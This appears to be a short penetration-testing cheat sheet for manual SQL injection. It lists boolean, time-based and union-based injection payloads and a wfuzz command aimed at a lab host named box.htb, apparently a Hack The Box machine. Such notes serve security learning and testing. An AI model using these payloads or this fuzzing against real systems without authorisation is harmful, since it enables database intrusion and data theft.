SQL Injection
Manual
' or 1=1
' or 1=1-- -
' or 1=1#
' or 1=1/
' or 1=1-- - //
' order by 1 -- -
' order by 1-- #
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3),'false') -- //
union select <number of columns>
%
If an application accepts a % as a wildcard the query most likely is putting
%'s inbetween the input (%joe%) to find something "like" the input
Fuzz with special characters
wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404
After finding an injection spot try to figure out how the query is structured
If the initial query is false then we can overwrite the output. We can insert payloads into one of the parameters
union select 1,2,(<Payload>),3,4,5,6,7
Last updated